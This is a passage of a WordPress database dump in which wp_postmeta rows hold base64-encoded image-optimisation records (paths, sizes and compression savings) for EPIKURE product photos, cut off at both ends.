3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTMzMDAtLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjo4MzksInRpbWUiOjE0ODM1NzcyNjUsImlkIjoxMDU1fV0='); 
INSERT INTO `wp_postmeta` VALUES (29796, 1054, 'wpfc_optimisation_reduction', '1537016'); 
INSERT INTO `wp_postmeta` VALUES (29797, 1054, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjAwLXNlcmllcy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzIwMC1zZXJpZXMuanBnIiwid2lkdGgiOjMwMDAsImhlaWdodCI6MjAwMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtMzIwMC1zZXJpZXMuanBnIiwicmVkdWN0aW9uIjoxNTM3MDAyLCJ0aW1lIjoxNDgzNTc3Mjc1LCJpZCI6IjEwNTQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzIwMC1zZXJpZXMtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMyMDAtc2VyaWVzLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjAwLXNlcmllcy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzI3OCwiaWQiOjEwNTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjAwLXNlcmllcy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzIwMC1zZXJpZXMtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTMyMDAtc2VyaWVzLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3MjgxLCJpZCI6MTA1NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMyMDAtc2VyaWVzLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjAwLXNlcmllcy03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtMzIwMC1zZXJpZXMtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzcyODMsImlkIjoxMDU0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzIwMC1zZXJpZXMtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjAwLXNlcmllcy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjAwLXNlcmllcy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3Mjg3LCJpZCI6MTA1NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMyMDAtc2VyaWVzLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjAwLXNlcmllcy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtMzIwMC1zZXJpZXMtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzcyODksImlkIjoxMDU0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzIwMC1zZXJpZXMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMyMDAtc2VyaWVzLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjAwLXNlcmllcy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzI5MiwiaWQiOjEwNTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjAwLXNlcmllcy0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzIwMC1zZXJpZXMtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTMyMDAtc2VyaWVzLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3Mjk0LCJpZCI6MTA1NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMyMDAtc2VyaWVzLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjAwLXNlcmllcy01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtMzIwMC1zZXJpZXMtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzcyOTcsImlkIjoxMDU0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjAwLXNlcmllcy0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzIwMC1zZXJpZXMtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTMyMDAtc2VyaWVzLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3Mjk5LCJpZCI6MTA1NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzIwMC1zZXJpZXMtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMyMDAtc2VyaWVzLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjAwLXNlcmllcy0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzMwMSwiaWQiOjEwNTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMyMDAtc2VyaWVzLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjAwLXNlcmllcy0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtMzIwMC1zZXJpZXMtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzczMDQsImlkIjoxMDU0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjAwLXNlcmllcy0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzIwMC1zZXJpZXMtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTMyMDAtc2VyaWVzLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3MzA2LCJpZCI6MTA1NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzIwMC1zZXJpZXMtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMyMDAtc2VyaWVzLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjAwLXNlcmllcy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzMwOCwiaWQiOjEwNTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMyMDAtc2VyaWVzLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjAwLXNlcmllcy00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtMzIwMC1zZXJpZXMtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzczMTEsImlkIjoxMDU0fV0='); 
INSERT INTO `wp_postmeta` VALUES (29798, 1053, 'wpfc_optimisation_reduction', '11127'); 
INSERT INTO `wp_postmeta` VALUES (29799, 1053, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMTAwLW1hcmluZS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzEwMC1tYXJpbmUuanBnIiwid2lkdGgiOjMwMDAsImhlaWdodCI6MjAwMCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU3NzMxNiwiaWQiOiIxMDUzIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMxMDAtbWFyaW5lLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMTAwLW1hcmluZS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtMzEwMC1tYXJpbmUtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjU4NywidGltZSI6MTQ4MzU3NzMxOSwiaWQiOjEwNTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMTAwLW1hcmluZS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzEwMC1tYXJpbmUtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTMxMDAtbWFyaW5lLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxMDY4LCJ0aW1lIjoxNDgzNTc3MzIzLCJpZCI6MTA1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMxMDAtbWFyaW5lLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMTAwLW1hcmluZS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtMzEwMC1tYXJpbmUtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjk0OSwidGltZSI6MTQ4MzU3NzMyNywiaWQiOjEwNTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMTAwLW1hcmluZS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMxMDAtbWFyaW5lLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTMxMDAtbWFyaW5lLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjMzNDMsInRpbWUiOjE0ODM1NzczMzMsImlkIjoxMDUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzEwMC1tYXJpbmUtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMxMDAtbWFyaW5lLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0zMTAwLW1hcmluZS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTI5LCJ0aW1lIjoxNDgzNTc3MzM2LCJpZCI6MTA1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMxMDAtbWFyaW5lLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMTAwLW1hcmluZS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtMzEwMC1tYXJpbmUtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQyNCwidGltZSI6MTQ4MzU3NzMzOSwiaWQiOjEwNTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMTAwLW1hcmluZS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzEwMC1tYXJpbmUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTMxMDAtbWFyaW5lLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0ODIsInRpbWUiOjE0ODM1NzczNDMsImlkIjoxMDUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzEwMC1tYXJpbmUtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMxMDAtbWFyaW5lLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0zMTAwLW1hcmluZS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6ODUyLCJ0aW1lIjoxNDgzNTc3MzQ3LCJpZCI6MTA1M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzEwMC1tYXJpbmUtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMxMDAtbWFyaW5lLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0zMTAwLW1hcmluZS0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NDIyLCJ0aW1lIjoxNDgzNTc3MzUwLCJpZCI6MTA1M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzEwMC1tYXJpbmUtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMxMDAtbWFyaW5lLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0zMTAwLW1hcmluZS0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6Mzg1LCJ0aW1lIjoxNDgzNTc3MzUzLCJpZCI6MTA1M30sey